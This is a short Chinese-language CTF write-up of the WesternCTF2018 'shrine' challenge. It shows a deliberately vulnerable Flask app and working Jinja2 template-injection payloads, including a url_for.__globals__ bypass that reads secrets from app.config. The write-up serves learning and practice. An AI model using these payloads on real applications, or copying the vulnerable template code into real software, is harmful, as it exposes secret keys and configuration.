[WesternCTF2018]shrine（学习）

首页长这样

import flask
import os

app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')


@app.route('/')
def index():
	return open(__file__).read()

@app.route('/shrine/<path:shrine>')
def shrine(shrine):
	def safe_jinja(s):
		s = s.replace('(', '').replace(')', '')
		blacklist = ['config', 'self']
		return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

	return flask.render_template_string(safe_jinja(shrine))

if __name__ == '__main__':
	app.run(debug=True)

显然是个flask的SSTI

/shrine/{{1+1}}

2

flag保存在app.config里，所以只要访问/shrine/{{config}}就可以了啊哈哈（

blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s

并不行，这俩被替换成None了

网上给出的解决方案是利用flask的url_for函数以及python的__globals__魔法，获取url_for所在环境中的全局变量

/shrine/{{url_for.__globals__}}

/shrine/{{url_for.__globals__['current_app'].config}}

#Web #python #flask #SSTI #urlfor #globals #bypass

> Passions & dreams like sora, *zipped* up in my heart

[WesternCTF2018]shrine（学习）

> Passions & dreams like sora, zipped up in my heart